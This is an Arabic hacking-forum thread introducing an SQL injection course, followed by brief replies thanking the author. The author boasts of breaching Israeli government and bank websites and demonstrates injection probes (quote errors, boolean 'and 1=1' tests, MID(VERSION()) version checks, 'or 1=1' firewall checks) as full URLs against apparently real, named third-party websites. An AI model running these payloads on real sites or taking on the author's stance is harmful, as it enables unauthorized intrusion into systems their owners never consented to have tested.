1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

المٌقدمة الأولي : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018

الموضوع في 'دورة حقن قواعد البيانات 2018/2017' بواسطة Ahmed El Melegy, بتاريخ ‏28 يوليو 2017.

كاتب الموضوع : Ahmed El Melegy المشاهدات : 916 الردود : 35 ‏28 يوليو 2017
  1. غير متصل

    Ahmed El Melegy InjectorBoy
    طاقم الإدارة

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    215
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    [​IMG]

    السلام عليكم ورحمة الله وبركاتة

    أهلا بجميع الأصدقاء إخوتي بشبكة عراق تيم

    دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018

    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر حيثٌ قمت
    والفريق التابع له بإختراق أكبر المواقع الصهيونية موقع الكنست بنوك مواقع وزراء الخ .. عن طريق هذا الثغرة
    ولا تستبعد وجودها بأكبر المواقع العالمية عزيزي حيث يقع بين يدي مواقع غاية في الحساسية من حيثٌ المكانه
    والمصنفه من اكبر المواقع فى مجالها لكن ليس الوقت مناسب لإختراقها حيث من الممكن أن تؤثر سلباً
    بطريق ما علي الإخوة ما فى غزة لكن مايفرق في وجوده فى المواقع الكبيره عنها في المواقع الصغيرة
    هي فى نسبة الحماية ومدى إمكانية إستغلالها لا أكثر .

    لذا سوف أقوم فى المستقبل القريب [الوقت الحالي] بنشر هذه الدورة الكبيرة في هذا المجال بصورة إحترافيه
    ومٌتاتبعه من حيثٌ الترتيب العملي والتقنية للمواد التعليمية


    هذا الموضوع التقديمي الأول [ سوف يكون عبارة عن مٌقدمة للنٌقط الأساسيه المطلوب تعلٌّمها في هذا المجال ]


    النٌقطة الأولى : إختبار وجود الثغرة

    [​IMG]

    من أساسيات هذا المجال أن يكون لدي المٌختبر علم صحيح لعملية الإختبار حيث أن هذا الأمر من الأساسيات
    التي لا غنى عنها وليس أمر هين كما سوف نرى بعد قليل فلا يستقل أحدكٌم بهذه النٌقطة ويغفل عن تعلمها


    تقنيات إختبار وجود الثغرة من عدمها


    1- إستخدام الرموز الثابته [رمز الكومة ' رمز الازدواج "]

    2- إنشاء قيمة جديدة للمٌتغير

    3- إستخدام المٌعاملات المنطقية


    <
    <
    <



    1- إستخدام الرموز الثابته [رمز الكومة ' رمز الإذدواج "]

    من أساسيات إختبار وجود الثغره والعمل على إظهار الخطأ ضمن الموقع المٌستهدف بصورة ثابتة
    عملية إضافة رمز الكومة ' بعد قيمة المٌتغير على النحو التالي :



    كود:
     www.plantandem.be/home.php?p=g&id=4'


    [​IMG]


    كما نٌلاحظ ظهر خطأ يدٌل على وجود الثغرة ضمن هذا الموقع جيد لكن هذا الأمر ليس ثابت وكٌل
    المواقع المٌختبرة بإستخدام القيمة الرمزية كومة فقد يكون هنا عملية فلترة لها فلا يظهر خطأ
    مع إستخدامها كما بالمثال التالي :



    كود:
    https://jdclement.com/en/amis.php?id=73489'


    [​IMG]



    كما نٌلاحظ لم يظهر أي خطأ يدٌل على وجود الثغرة لكني سوف أعتقد أن الرمز كومة يقع تحت
    الفلترة من باب الحماية لذه سوف أستخدم القيمة المٌضاعفة منها رمز الازدواج "



    كود:
    https://jdclement.com/en/amis.php?id=73489"


    [​IMG]
    ظهر الخطأ الدال على وجود الثغرة بقاعدة البيانات وهذه هي النقطه الأولى
    من أليات العمل على كشف وجود الثغرة



    2- إنشاء قيمة جديدة للمٌتغير

    إنشاء قيمة جديدة ضمن مٌتغير الموقع الثابت والمٌخزن ضمن الذاكرة سوف يجعل مردود الموقع كما لو
    قٌمنا بزراعة عضو جديد بالجسم ليس مٌناسب سوف يرفضه كـ رد فعل طبيعي وهذا تمام ما سوف
    يحدٌث مع الموقع لنٌتابع ونرى ما أقصد هٌنا

    سوف أقوم بإدخل قيمة أبجدية لأحد الحروف الإنجليزية إلي قيمة المٌتغير 4 ونٌشاهد ما سوف يحدٌث


    كود:
     www.plantandem.be/home.php?p=g&id=4a


    [​IMG]



    الموقع يٌخبرنا بعدم وجود مٌتغير أو عمود يحمل القيمة 4a وهذا إن دل على شئ يدٌل على وجود الثغرة


    Unknown column '4a' in 'where clause'


    وهذا فقط يٌعتمد في حالة تفعيل خاصية الجٌمل النصية ضمن قاعدة البيانات لنرى مردود كهذا


    3- إستخدام المٌعاملات المنطقية

    المٌعاملات المنطقية تٌستخدم لعملية السؤال وإنتظار الرد من قاعدة البيانات ومن باب المٌقارنة
    بين النتائج الظاهرة , والقيم المٌستخدمة لذلك هي القيم


    +and+1=1

    +and+1=2



    كود:
     www.plantandem.be/home.php?p=g&id=4+and+1=1



    [​IMG]



    في الحالة الأولي الصفحة ضمن الموقع تعمل بصورة جيدة بلا أية أخطاء



    كود:
    www.plantandem.be/home.php?p=g&id=4+and+1=2


    [​IMG]
    وفي الحالة الثانية كما نٌلاحظ الصفحة تغيرت وظهرة فى صورة بيضاء مما دل على وجود الثغرة



    النٌقطة الثانية : تقنية معرفة قيمة إصدار قاعدة البيانات


    [​IMG]


    من الضروري جداً معرفة قيمة إصدار قاعدة البيانات قبل عملية الحقن الكامل للموقع المٌصاب
    لأن كٌل الإصدارات التي قبل الإصدار الخامس لا تستخدم تقنية الـ information_schema
    لتخزين البيانات ضمن قاعدة البيانات والتي نستطبع معها إستخدام الإستعلامات لإتمام عملية
    الحقن بصورة صحيحة وفي حال كان الإصدار ما قبل الإصدار الخامس فلا توجد طريقة لعملية
    حقن ناجحه بدون إستخدام تقنية التخمين على الجداول والإعمدة مما يستغرق وقت أطول وليس
    مضمون معرفتهم بالتخمين , وبمعرفة قيمة إصدار القاعدة قبل الحقن سوف يجعلنا نقوم بالعملية
    ببال مٌرتاح لعلمنا بسهولة الأمر بإستخدام الأوامر الجاهزة .


    الإستعلامات المٌستخدمة لمعرفة قيمة إصدار قاعدة البيانات


    كود:
    +AND MID(VERSION(),1,1) = '3';
    
    +AND MID(VERSION(),1,1) = '4';
    
    +AND MID(VERSION(),1,1) = '5'; 



    وتٌضع هذه الإستعلامات بعد قيمة المٌتغير الرقمية للموقع الهدف على النحو التالي



    كود:
     www.plantandem.be/home.php?p=g&id=4+AND MID(VERSION(),1,1) = '3';  


    [​IMG]
    كود:
     www.plantandem.be/home.php?p=g&id=4+AND MID(VERSION(),1,1) = '4';  


    [​IMG]
    كود:
     www.plantandem.be/home.php?p=g&id=4+AND MID(VERSION(),1,1) = '5';  


    [​IMG]


    كما لاحظنا الصفحة قامت بالتحميل بصورة قطعية صحيحة فى حالة القيمة الرقمية خمسة 5 والتي
    تعني أن إصدار قاعدة بيانات الموقع هى الإصدار الخامس من قواعد البيانات التي تستخدم
    الـ information_schema



    النٌقطة الثالثة : إختبار وجود حماية ضمن الموقع


    هذا أمر أخر هام نقوم به قبل الخوض في عملية الحقن حتى لا نتفاجئ بوجود حماية توقف عملنا وقت إستخدام
    الإستعلامات الغير مٌفلترة


    الإستعلامات المٌستخدم لمعرفة وجود حماية ضمن الموقع


    كود:
    +or+1 = 1

    في حالة وضع هذا الإستعلام بعد القيمة الرقمية لأي موقع مصاب وفي حالة وجود
    حماية تحمي قاعدة البيانات سوف يظهر على الفور رسالة تدول على وجود
    جدار الحماية الذي سوف يوقف هذا الإستعلام عن الإستمرار



    كود:
    www.plantandem.be/home.php?p=g&id=4+or+1 = 1


    [​IMG]




    إلي هٌنا تنتهي المٌقدمة الأولي وتأتيكم المٌقدِمة الثانية في وقتِ لاحق


    تحياتي لكٌم جميعاً وفي شوق للقائكم مرة أٌخرة في أقرب وقت مٌمكن

     


    آخر تعديل: ‏30 يوليو 2017
    DEaLeR_HaCKeR ،خربوش ،Magic7hearts و 27آخرون معجبون بهذا.
    جاري تحميل الصفحة...
  2. غير متصل

    ! ـآوتآر !
    DeveloPer Plus

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    بارك الله فيك مجهود تشكر عليه
     


    أعجب بهذه المشاركة Ahmed El Melegy
  3. غير متصل

    Jankaro
    rankrank
    Developer

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    السلام عليكم

    بيض الله وجهك يا عسسل ..

    في انتضار باقي الدروس ..
     


    أعجب بهذه المشاركة Ahmed El Melegy
  4. غير متصل

    بــرهــومــي
    rankrank
    Developer

    عضو منذ:
    ‏9 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    thanks may frend
     


    أعجب بهذه المشاركة Ahmed El Melegy
  5. غير متصل

    بــرهــومــي
    rankrank
    Developer

    عضو منذ:
    ‏9 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    Like
    :heart:
     


    أعجب بهذه المشاركة Ahmed El Melegy
  6. غير متصل

    CαSpЄr
    Developer

    عضو منذ:
    ‏16 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:


    بارك الله فيك

    شكراً لك على الطرح الرائع
     


    أعجب بهذه المشاركة Ahmed El Melegy
  7. غير متصل

    Spirtkoz
    rank
    Developer

    عضو منذ:
    ‏11 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    الله يعطيك ألف عافية
     


    أعجب بهذه المشاركة Ahmed El Melegy
  8. غير متصل

    Dr.Sh$ll
    rankrank
    Developer

    عضو منذ:
    ‏11 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الإقامة:

    شرح كافي ووافي جداً

    سلمت يمناك يا بطل

    تحياتي لك
     


    أعجب بهذه المشاركة Ahmed El Melegy
  9. غير متصل

    ĔvĭĻ
    rankrank
    DeveloPer Plus

    عضو منذ:
    ‏12 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    بارك الله فيك
     


    أعجب بهذه المشاركة Ahmed El Melegy
  10. غير متصل

    Sword Fisher
    rank
    Developer

    عضو منذ:
    ‏7 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    بارك الله فيك شرح مفيد استمر يا بطل
     


    أعجب بهذه المشاركة Ahmed El Melegy

مشاركة هذه الصفحة

جاري تحميل الصفحة...